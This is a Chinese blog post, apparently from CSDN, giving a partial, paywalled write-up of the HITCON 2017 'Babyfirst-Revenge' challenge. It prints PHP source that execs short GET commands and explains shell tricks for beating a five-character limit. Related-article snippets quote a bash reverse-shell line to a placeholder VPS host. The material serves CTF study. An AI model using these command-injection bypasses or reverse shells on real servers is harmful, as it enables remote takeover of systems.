Babyfirst-Revenge

原创 已于 2023-01-05 15:40:30 修改 · 783 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

于 2023-01-03 15:58:03 首次发布

[HITCON 2017]Babyfirst-Revenge

翻buuoj的时候看到了这道题,分值高达92分,只有32个师傅解出来了这道题,简单看了下其他师傅的wp,这道题乎与Linux命令有关,很有意思,于是参考其他师傅的wp我准备挑战下这道题。

进入题目环境页面上直接出现了源码:

 <?php
    echo $_SERVER['REMOTE_ADDR']."\n";
    $sandbox = '/var/www/html/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

简单分析下,题目会自动创建一个/var/www/html/sandbox/文件夹,然后切换目录至改位置,接着满足条件的情况下我们可以执行命令,不过这里有个很明显的难点,就是限制cmd参数的长度必须小于等于五,否则直接给你rm -rf了,所以现在的难点就在于怎么在命令长度受限的情况下实现get shell。

翻了翻P牛的博客,发现他早就提过这个小tips了,参考其他师傅的wp,下面我们来简单分析下:

首先,linux中可以用\拼凑命令,比如l\ s,这样等效于ls:

其次我们可以用sh filename执行文件里的有效文件命令,即使其中有非命令字符串也只会报错,还是会继续执行有效的文件命令:

还有一个很经典的linux知识点,我们可以通过>+fileanme来实现新建一个文件(>是覆盖,>>是追加),这个tips挺好用的,比如某个你在某个网站发现一个无回显的命令注入点,你可以用cat *>1.txt,将内容全部写

最低0.47元/天 解锁文章
Da2kSupr3m3
关注
BabyFirst-Revenge
heySister
09-15 937
前几天做ctf交流群的入门题…然后顺着就找到了BabyFirst系列的题目,所以打算做一做。 首先,参考了https://www.jianshu.com/p/a77e956d9941 ,里面也有对应HITCON各年比赛的docker环境,方便复现题目。 打开页面,代码很短,而且就很直白地告诉我们,这里可以有命令执行,就看能不能绕过。 &amp;amp;lt;?php $sandbox = '/w...
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 3046
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
BabyFirst-Revenge-V2 Writeup
heySister
09-19 924
BabyFirst-Revenge-V2 题目进行升级,允许输入的长度变成4,那之前的ls&gt;&gt;B 命令就无法绕过对长度对限制了。 用到的知识点: 1. Linux下使用 * 的作用:匹配当前目录下的文件名,并执行拼接后的语句; 2. dir指令和ls指令的功能相同,都是以字典序将所在目录下的文件名输出; 3. rev指令可以将某一文件内容以倒序输出。 *指令执行结果: (相当于执行...
HITCON2017 babyfirst-revenge
forbidd3n,keep going
07-01 3615
初看这题,完全没有思路???!!!没辙,只能找大佬,看了网上各路大神的思路,从看不懂writeup到慢慢理解原理,学习了~多数writeup思路差不多,总归是利用\来多次输入命令,绕过长度限制,有的人直接curl xxx(不用ls -t这个我没有成功,因为是在构造不出ip地址各种进制的序列问题),痛苦~~关键一:绕过5位长度限制要想绕过长度限制执行多条命令,显然会想到先将命令放到文件中取执行。第一...
HITCON 2017 babyfirst-revenge(命令执行绕过三)
郁离歌丶的博客
05-02 970
今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的修炼了。其实已经12点,注定今天又做不了多少。估计要被梅子酒笑话了md...再理一下之前有的思路:1.利用'&gt;'+'字符'+'\'+'\'几个字符创建文件(ps:'\'是会把后面的转义掉的,所以如果要让他出现在文件名中,就得用两个\\2.使用ls串接命令可以用ls -t   (ps:ls -t...
HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 695
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
Hitcon2017 babyfirst-revenge v2复现
0verWatch的博客
09-18 1190
这个题目的条件更加苛刻了,先放个源码 &lt;?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &amp;&amp; strlen($_GET['c...
HITCON2017 BabyFirst Revenge (短命令执行)
a3320315的博客
01-12 1061
0x01 源码 <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['cmd']) <=...
HITCON 2017 babyfirst-revenge(命令执行绕过二)
郁离歌丶的博客
04-30 1105
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
HITCON 2017 babyfirst-revenge(命令执行绕过四)
郁离歌丶的博客
05-03 784
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&l...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)
郁离歌丶的博客
05-07 1336
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_2/index.php发现和上一题大体相似,但是发现有一个不一样,长度从5变成了4,没办法利用&gt;&gt;二次写入了。但是我们如果就这样是没法儿按照字典序直接写入ls -t&gt;g到文件的。 因为这一串无论怎么分割写入都无法遵从字典序或是字典序的逆序。然...
Hitcon2015 babyfirst复现
0verWatch的博客
09-14 1252
前言 继续上面的题目,直接利用上一道题目的docker环境复现一道题目,注意这里面的docker环境可能需要自己在某些文件夹下面设置权限,自己缺点什么环境就自己下就行了,感觉这个题目的难度比较上一题低了一点,参考博客: https://blog.spoock.com/2017/09/09/Babyfirst-writeup/ 正文 先放个题目代码 &lt;?php high...
PHP Filter伪协议Trick总结
gental_z的博客
01-04 1万+
PHP Filter伪协议Trick总结 前言:最近在学习的过程中碰到了很多的filter协议的小trick,在此做一个总结以及对filter协议的一些探索。 PHP Filter协议介绍 ​ php://filter是php中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。官方解释为: php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
BUUCTF[ctf473831530_2018_web_virink_web]
qq_62078839的博客
06-12 992
文件存储路径就是md5(orange.ip)限制字符写shell 参考文章CTF-web 第十三部分 命令注入 成功写入shell通过上面的脚本写入shell,连上蚁剑 看一下主机信息 这里并没有看到内网ip,换个姿势 试了一下这里面的ip都没有开放端口,再经过Article_kelp师傅的帮助下,扫描到了ip 9000对应php-fpm,873对应nsync我们可以自己构造fastcgi协议,和fpm进行通信参考文章Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp
linux下反弹shell
weixin_30904593的博客
04-02 376
01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波。 02 环境 win10 192.168.43.151 监听端 装有nc kali 192.168.253.128 反弹端 自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp|udp]/host...
php如何打网页ctf,【CTF 攻略】如何绕过四个字符限制getshell
weixin_28729331的博客
03-17 813
预估稿费:400RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言本文主要整理如何巧用Linux命令绕过命令注入点的字符数量限制,内容围绕HITCON CTF 2017 的两道题展开,先讲五个字符的限制,再讲四个字符的。在此感谢下主办方分享这么有趣的点子。热身问题的起源是 HITCON CTF 2017 的 BabyFirst Revenge 题,题目的主要代码如下:B...
(4)5位可控字符下的任意命令执行-----另一种解题方法
大方子
11-06 3625
有道分享链接:https://note.youdao.com/ynoteshare1/index.html?id=55e53db4f857d81515e57e104777b88b&type=note 前言: 题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v2来进行学习研究的 <?php ...
chickeneo-voxel-revenge:重新审视2016年的JavaScript游戏项目
最后,提供的压缩包子文件的文件名称列表仅包含一个条目“chickeneo-voxel-revenge-master”,这表明所提交的文件是项目的主分支或主版本,没有其他分支或版本。 从这个文件信息中,我们可以了解到一个关于游戏开发...
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值